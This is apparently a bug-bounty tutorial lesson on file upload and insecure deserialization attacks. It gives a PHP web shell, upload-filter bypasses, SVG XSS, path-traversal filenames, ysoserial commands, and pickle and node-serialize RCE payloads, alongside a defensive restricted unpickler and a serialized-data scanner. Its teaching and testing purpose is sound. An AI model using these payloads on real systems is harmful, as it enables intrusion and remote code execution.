Advanced Exploitation Techniques

File Upload & Deserialization Attacks


Unrestricted file upload and insecure deserialization are high-impact vulnerability classes that frequently lead to Remote Code Execution (RCE). These vulnerabilities consistently yield critical-severity bounties.

File Upload Vulnerabilities

Basic Web Shell Upload

# PHP web shell
<?php system($_GET['cmd']); ?>

# Save as: shell.php
# Upload to profile picture
# Access: https://example.com/uploads/shell.php?cmd=id

Bypass Techniques

Extension Bypass

# Blacklist bypass
shell.php5
shell.phtml
shell.php.jpg
shell.php%00.jpg  # Null byte (old systems)
shell.pHp  # Case variation

# Double extension
shell.jpg.php
shell.php.jpg (with Apache misconfiguration)

# Content-Type manipulation
Change: image/jpeg → application/x-php (in request)

Magic Bytes Injection

# Add image magic bytes to PHP file
GIF89a<?php system($_GET['cmd']); ?>

# Or prepend to file
echo -e 'GIF89a' | cat - shell.php > polyglot.php.gif

SVG XSS

<!-- SVG files often allowed as "images" -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert('XSS')</script>
</svg>

<!-- Or with onload -->
<svg onload="alert('XSS')">

Exploitation Scenarios

Upload location      Impact
-------------------  ------------------------------
Web root             Direct RCE via web shell
User profile         Stored XSS via SVG/HTML
Document storage     PDF/Office exploits, XXE
Backup directory     Path traversal + overwrite

Path Traversal in Upload

# Filename manipulation
filename="../../../var/www/html/shell.php"
filename="....//....//....//var/www/html/shell.php"

# Overwrite sensitive files
filename="../../../etc/cron.d/malicious"

Deserialization Attacks

When an application deserializes data it received from an untrusted source, an attacker who controls that data can usually turn the deserialization step into arbitrary code execution.

Java Deserialization

# Detection: Base64-encoded data starting with rO0
# Or: AC ED 00 05 (hex magic bytes)

# Tools
ysoserial: Generate payloads
java -jar ysoserial.jar CommonsCollections1 'id' | base64

# Common gadget chains
CommonsCollections1-7
Spring1-4
Hibernate1-2

PHP Deserialization

// Vulnerable code
$data = unserialize($_GET['data']);

// Attack: craft an object of a class whose __destruct or __wakeup method does something dangerous
O:9:"ClassName":1:{s:4:"data";s:2:"id";}

Python Pickle

# Vulnerable
import pickle
data = pickle.loads(user_input)

# Attack payload
import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
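The __reduce__ payload above only works because the default unpickler will resolve any global the data names. The defensive counterpart is an added example, not code from the page: a pickle.Unpickler subclass whose find_class refuses everything outside an allow-list, so the GLOBAL opcode naming os.system is rejected before the REDUCE opcode can call it. The allow-list of builtin types and the sample blobs are assumptions made for this example; the suspicious sample merely references os.system as a global rather than calling it.

```python
import io
import os
import pickle

# Assumption for this example: the application only ever needs plain builtin
# containers and scalars back from its pickled data, so every other global
# reference (os.system, subprocess.Popen, ...) is refused before it is resolved.
SAFE_GLOBALS = {
    ("builtins", name)
    for name in ("dict", "list", "set", "frozenset", "tuple", "str", "int", "float", "bool")
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allow-listed globals.

    A payload built with __reduce__ is, on the wire, a GLOBAL opcode naming the
    callable followed by a REDUCE opcode; refusing the lookup in find_class stops
    the chain before REDUCE can invoke anything.
    """

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return getattr(__import__(module), name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that enforces SAFE_GLOBALS."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_blocked(data: bytes) -> bool:
    """True when the restricted loader refuses the payload."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def benign_sample() -> bytes:
    # Constructed: the kind of session blob an application might legitimately pickle.
    return pickle.dumps({"user": "alice", "roles": ["viewer"]})


def suspicious_sample() -> bytes:
    # Constructed: a pickle that only *references* os.system as a global. Plain
    # pickle.loads() would resolve it; a __reduce__ payload would go on to call it.
    return pickle.dumps(os.system)


if __name__ == "__main__":
    print("benign   ->", restricted_loads(benign_sample()))
    print("blocked? ->", is_blocked(suspicious_sample()))
```

The allow-list approach contains the damage but does not make pickle a safe format for untrusted input; where the data only needs containers and scalars, JSON removes the problem entirely. PHP's unserialize() offers the same idea through its allowed_classes option (PHP 7.0 and later).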

Node.js node-serialize

# Vulnerable: node-serialize package
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id')}()"}

# Detection: Look for "_$$ND_FUNC$$_" in serialized data

Detection Techniques

Finding Serialized Data

# Look in:
# - Cookies
# - Hidden form fields
# - API request/response bodies
# - WebSocket messages

# Java indicators
rO0...  (Base64)
AC ED 00 05 (raw hex)

# PHP indicators
O:4:"User":1:{...}
a:2:{i:0;s:4:"test"...}

# .NET indicators
AAEAAAD/////... (Base64)
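A scanner that applies the indicators above to every cookie, form field, query parameter and body value of a request, as an added example (not code from the original page). It checks each value as-is and, when the value looks like base64, a decoded layer too, so a raw Java stream hidden in a base64 cookie is reported twice (by its rO0 prefix and by its AC ED 00 05 bytes). The Python pickle entry (PROTO opcode 0x80 followed by a protocol number) goes beyond the page's list; the location labels and the sample request are constructed for this example.

```python
import base64
import binascii
import pickle
import re

# One regex per format, built from the indicators listed above. The pickle
# entry (PROTO opcode 0x80 then a protocol number) is an addition beyond the list.
INDICATORS = [
    ("java (raw)",     re.compile(rb"\xac\xed\x00\x05")),
    ("java (base64)",  re.compile(rb"rO0AB")),
    ("php object",     re.compile(rb'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')),
    ("php array",      re.compile(rb'a:\d+:\{(?:i:\d+|s:\d+:")')),
    (".net (base64)",  re.compile(rb"AAEAAAD/////")),
    ("node-serialize", re.compile(rb"_\$\$ND_FUNC\$\$_")),
    ("python pickle",  re.compile(rb"\x80[\x02-\x05]")),
]

_B64_SHAPE = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")


def _layers(value: bytes):
    """Yield the value itself, then its base64 decoding when it looks like base64."""
    yield value
    candidate = value.strip()
    if _B64_SHAPE.fullmatch(candidate):
        padded = candidate + b"=" * (-len(candidate) % 4)
        try:
            yield base64.b64decode(padded, validate=True)
        except binascii.Error:
            return


def scan_request(fields: dict) -> list:
    """Return sorted (location, format) pairs for every indicator found.

    `fields` maps a location label (cookie:, form:, body:, query:) to the raw
    value seen there, so one scan covers all four places listed above.
    """
    hits = set()
    for location, value in fields.items():
        data = value.encode("utf-8", "surrogateescape") if isinstance(value, str) else value
        for layer in _layers(data):
            for fmt, pattern in INDICATORS:
                if pattern.search(layer):
                    hits.add((location, fmt))
    return sorted(hits)


# Constructed sample request: one value per format plus a harmless query string.
SAMPLE_REQUEST = {
    "cookie:session": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==",   # base64 of AC ED 00 05 ... java.util.HashMap
    "form:state": 'O:4:"User":1:{s:4:"role";s:5:"admin";}',
    "body:profile": '{"rce":"_$$ND_FUNC$$_function(){}()"}',
    "cookie:viewstate": "AAEAAAD/////AQAAAAAAAAAMAgAAAA==",
    "body:cache": base64.b64encode(pickle.dumps({"k": 1}, protocol=4)).decode(),
    "query:q": "search term",
}

if __name__ == "__main__":
    for location, fmt in scan_request(SAMPLE_REQUEST):
        print(f"{location:18} {fmt}")
```

Run over captured traffic, the output is a list of places where the application round-trips a serialized object through the client; each of those is a candidate for the format-specific tests in the checklist below, and on the defending side each is a parameter that should carry a MAC or be replaced by an opaque server-side reference.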

Automated Detection

# Using Burp extensions
# - Java Deserialization Scanner
# - PHP Object Injection Check

# Nuclei templates
nuclei -l targets.txt -tags deserialization

Bounty Examples

Company   Bug type                  Bounty
--------  ------------------------  -------
PayPal    Java deserialization RCE  $20,000
Uber      File upload RCE           $10,000
Yahoo     PHP object injection      $7,500
Airbnb    SVG XSS via upload        $3,500

Testing Checklist

File Upload:

  • Test all extension variations
  • Test content-type manipulation
  • Test magic bytes injection
  • Test path traversal in filename
  • Check where file is stored (accessible?)
  • Try SVG/HTML for XSS

Deserialization:

  • Identify serialized data in app
  • Determine serialization format
  • Test with ysoserial (Java)
  • Test PHP object injection
  • Check for known vulnerable libraries

Pro Tip: File upload and deserialization often combine: upload a file containing a serialized payload, then trigger its deserialization through another feature of the application.

Next, we'll explore Server-Side Template Injection (SSTI).
